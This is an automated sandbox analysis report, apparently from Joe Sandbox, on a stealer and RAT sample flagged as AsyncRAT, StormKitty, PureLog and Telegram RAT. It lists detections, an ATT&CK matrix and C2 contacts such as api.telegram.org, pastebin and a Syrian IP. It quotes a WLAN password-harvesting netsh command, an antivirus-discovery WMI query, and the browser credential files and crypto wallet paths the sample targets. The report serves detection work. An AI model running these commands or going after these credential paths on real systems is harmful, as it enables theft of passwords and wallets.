                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeQueries volume information: C:\Users\user\AppData\Local\Temp\udwnme.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\luglzv.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Uses netsh to modify the Windows network and firewall settings
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: udwnme.exe, 0000000F.00000002.2935712753.000000000560E000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2937611618.000000000573D000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2932822508.0000000004FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 7.2.svchost.exe.7450000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.436ff90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.7450000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.436ff90.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected StormKitty Stealer
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Yara detected WorldWind Stealer
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Tries to harvest and steal WLAN passwords
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 7.2.svchost.exe.7450000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.436ff90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.7450000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.436ff90.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected StormKitty Stealer
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Yara detected WorldWind Stealer
                    Source: Yara matchFile source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts131
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Web Service                    		Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts2
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory134
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    PowerShell                    		2
                    Scheduled Task/Job                    		2
                    Scheduled Task/Job                    		111
                    Obfuscated Files or Information                    		Security Account Manager441
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets251
                    Virtualization/Sandbox Evasion                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input Capture4
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1464066 Sample: zrrHgsDzgS.exe Startdate: 28/06/2024 Architecture: WINDOWS Score: 100 95 pastebin.com 2->95 97 api.telegram.org 2->97 99 4 other IPs or domains 2->99 123 Snort IDS alert for network traffic 2->123 125 Multi AV Scanner detection for domain / URL 2->125 127 Found malware configuration 2->127 133 23 other signatures 2->133 11 svchost.exe 1 5 2->11         started        16 zrrHgsDzgS.exe 7 2->16         started        signatures3 129 Connects to a pastebin service (likely for C&C) 95->129 131 Uses the Telegram API (likely for C&C communication) 97->131 process4 dnsIp5 101 94.232.249.111, 49739, 49740, 64789 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 11->101 103 127.0.0.1 unknown unknown 11->103 79 C:\Users\user\AppData\Local\Temp\udwnme.exe, PE32 11->79 dropped 81 C:\Users\user\AppData\Local\Temp\luglzv.exe, PE32 11->81 dropped 137 System process connects to network (likely due to code injection or exploit) 11->137 139 Multi AV Scanner detection for dropped file 11->139 141 Found many strings related to Crypto-Wallets (likely being stolen) 11->141 18 cmd.exe 11->18         started        21 cmd.exe 1 11->21         started        83 C:\Users\user\AppData\Roaming\svchost.exe, PE32 16->83 dropped 85 C:\Users\user\AppData\...\zrrHgsDzgS.exe.log, ASCII 16->85 dropped 143 Drops PE files with benign system names 16->143 23 cmd.exe 1 16->23         started        25 cmd.exe 1 16->25         started        file6 signatures7 process8 signatures9 113 Suspicious powershell command line found 18->113 27 powershell.exe 18->27         started        29 conhost.exe 18->29         started        31 powershell.exe 12 21->31         started        33 conhost.exe 21->33         started        115 Bypasses PowerShell execution policy 23->115 117 Uses schtasks.exe or at.exe to add and modify task schedules 23->117 119 Uses netsh to modify the Windows network and firewall settings 23->119 121 Tries to harvest and steal WLAN passwords 23->121 35 conhost.exe 23->35         started        37 schtasks.exe 1 23->37         started        39 svchost.exe 3 25->39         started        41 conhost.exe 25->41         started        43 timeout.exe 1 25->43         started        process10 process11 45 luglzv.exe 27->45         started        50 udwnme.exe 14 150 31->50         started        dnsIp12 105 pastebin.com 104.20.4.235, 443, 64801 CLOUDFLARENETUS United States 45->105 87 C:\Users\user\AppData\...87WTVCDUMOB.jpg, ASCII 45->87 dropped 89 C:\Users\user\AppData\...\KATAXZVCPS.xlsx, ASCII 45->89 dropped 91 C:\Users\user\AppData\...\UMMBDNEQBN.pdf, ASCII 45->91 dropped 93 2 other malicious files 45->93 dropped 145 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 45->145 147 Tries to harvest and steal browser information (history, passwords, etc) 45->147 149 Tries to harvest and steal WLAN passwords 45->149 151 Modifies existing user documents (likely ransomware behavior) 45->151 52 cmd.exe 45->52         started        55 cmd.exe 45->55         started        107 api.telegram.org 149.154.167.220, 443, 64791, 64792 TELEGRAMRU United Kingdom 50->107 109 icanhazip.com 104.16.184.241, 64788, 64795, 80 CLOUDFLARENETUS United States 50->109 111 api.mylnikov.org 104.21.44.66, 443, 64790, 64796 CLOUDFLARENETUS United States 50->111 153 Multi AV Scanner detection for dropped file 50->153 155 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 50->155 57 cmd.exe 50->57         started        59 cmd.exe 50->59         started        file13 signatures14 process15 signatures16 75 4 other processes 52->75 77 3 other processes 55->77 135 Tries to harvest and steal WLAN passwords 57->135 61 conhost.exe 57->61         started        63 chcp.com 57->63         started        65 netsh.exe 57->65         started        67 findstr.exe 57->67         started        69 conhost.exe 59->69         started        71 chcp.com 59->71         started        73 netsh.exe 59->73         started        process17

                    Screenshots

                    Thumbnails

